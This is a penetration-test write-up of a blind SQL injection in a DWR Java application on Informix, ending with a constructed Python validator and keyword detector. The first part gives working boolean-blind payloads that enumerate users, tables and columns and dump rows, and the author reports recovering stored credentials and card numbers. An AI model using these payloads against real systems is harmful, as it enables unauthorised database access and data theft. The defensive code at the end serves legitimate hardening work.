In a recent application penetration test I found an interesting SQL injection (SQLi) vulnerability.
Two things made this SQLi interesting:
1. The development framework the application was built on (DWR)
2. The database in use
Below I describe the problems I ran into, how I solved them, and how I dumped the database. The application used a Java remote-call framework called DWR (Direct Web Remoting) on the backend. A call to the system looked like this:
The parameter of interest is c0-param1. On the surface it looked easy, because the application returned detailed error information: appending a single quotation mark to the end of the parameter produced the error message "java.sql.SQLException: A syntax error has occurred." (a syntax error).
The c0-param1 parameter controls how many results are retrieved from the database, so the injection lands in the position of a TOP-style keyword, similar to TOP in MSSQL and LIMIT in MySQL. At that point I thought the backend was more likely MSSQL than MySQL. I then sent a series of requests, shown here:
Executing the query produced the error "java.sql.SQLException: The column (card_no) must be in the group by list." That message told me the database was IBM's Informix. I knew little about Informix, so for every function I wanted to use I had to look it up in IBM's documentation.
Knowing that this is Informix helps in crafting the next injection. Its FIRST clause, the equivalent of TOP and LIMIT, is injected like this:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
If the condition is true (that is, the first letter of the current user name is 'a'), the query returns its normal result. Otherwise an error is returned, because the subquery (SELECT 1 FROM SYSTABLES) returns multiple rows. However, the equals sign turned out to be difficult to use, so I replaced it as in the following statement:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
With the injection technique worked out, it would have been far easier to hand the rest over to sqlmap (a colleague gave me some tips, and I had read his post "Sqlmap advanced injection techniques"); sqlmap really is a good tool, and its author presented it at a conference this year. Unfortunately, sqlmap did not support Informix, so I had to write the tooling myself:
Get the table name length:
c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
Get table name:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
Get the number of columns in a table:
c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
Get the column name length:
c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
Get the column name:
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
After a little research I found that Informix tables have a hidden column named ROWID, which gives each row a serial number. However, these ROWIDs can be sparse, because rows get deleted from and inserted into tables over time. To find a ROWID that actually holds data, I used a function named NVL, which returns a different result depending on whether its first argument is NULL; for this to work, pick a column that is likely to always contain data. The statements:
c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),
c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),
In this way I found plaintext application credentials, plaintext bank SFTP credentials, and unencrypted payment card numbers.
With this success behind me, I now understand the Informix database far better than I did before.
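The root cause throughout this write-up is that a "how many rows" value from c0-param1 is concatenated into the FIRST/TOP position of the query, where a bind parameter is not available, so the only safe option is to accept nothing but a small, bounded integer there. The following is an added example, not code from the original post or the tested application: it parses DWR batch bodies, applies that allow-list check to c0-param1, and flags the keywords that the blind-injection payloads above rely on. The service and method names, the row-count limit, and the sample request bodies are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample DWR batch bodies (one key=value pair per line, as DWR sends them).
# The first is a benign call; the others mirror the shape of the payloads discussed above.
SAMPLE_REQUESTS = [
    "callCount=1\nc0-scriptName=OrderService\nc0-methodName=list\nc0-param0=string:42\nc0-param1=string:10\n",
    "callCount=1\nc0-scriptName=OrderService\nc0-methodName=list\nc0-param0=string:42\n"
    "c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) "
    "LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),\n",
    "callCount=1\nc0-scriptName=OrderService\nc0-methodName=list\nc0-param0=string:42\n"
    "c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),\n",
    "callCount=1\nc0-scriptName=OrderService\nc0-methodName=list\nc0-param0=string:42\nc0-param1=string:10'\n",
]

DWR_STRING_PREFIX = "string:"
MAX_ROWS = 100  # hypothetical upper bound for a page size; choose what the application really needs

# Keywords that the enumeration payloads on this page depend on; used for triage labelling only.
SUSPICIOUS = re.compile(
    r"\b(CASE|WHEN|SELECT|NVL|SUBSTR|CHAR_LENGTH|SYSTABLES|SYSCOLUMNS|ROWID)\b", re.IGNORECASE
)


def parse_dwr_params(body: str) -> dict:
    """Split a DWR batch body into a {key: value} dict, URL-decoding the values."""
    params = {}
    for line in body.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        params[key.strip()] = unquote_plus(value)
    return params


def validate_row_count(raw: str) -> int:
    """Allow-list check for the row-count parameter: DWR type prefix, digits only, bounded.

    Anything else is rejected before it can reach query construction.
    """
    if not raw.startswith(DWR_STRING_PREFIX):
        raise ValueError("unexpected DWR type prefix")
    value = raw[len(DWR_STRING_PREFIX):]
    if not re.fullmatch(r"[0-9]{1,3}", value):
        raise ValueError(f"row count is not a plain integer: {value!r}")
    count = int(value)
    if not 1 <= count <= MAX_ROWS:
        raise ValueError(f"row count out of range: {count}")
    return count


def triage(body: str) -> dict:
    """Classify one request: accepted with its parsed row count, or rejected with the reason
    and the SQL keywords found in the offending value (empty for a plain malformed value)."""
    raw = parse_dwr_params(body).get("c0-param1", "")
    try:
        count = validate_row_count(raw)
    except ValueError as exc:
        indicators = sorted({m.upper() for m in SUSPICIOUS.findall(raw)})
        return {"verdict": "rejected", "reason": str(exc), "sqli_indicators": indicators}
    return {"verdict": "ok", "rows": count, "sqli_indicators": []}


def audit(bodies) -> list:
    """Run triage over a batch of captured request bodies (e.g. from a request log)."""
    return [triage(body) for body in bodies]


if __name__ == "__main__":
    for result in audit(SAMPLE_REQUESTS):
        print(result)
```

Only the value returned by validate_row_count should ever be formatted into the FIRST clause; the triage output is what a detection rule would log, and the fourth sample (a bare single quote) shows that a malformed value is rejected even when it carries no SQL keywords, so the error-message behaviour the post exploited never comes into play.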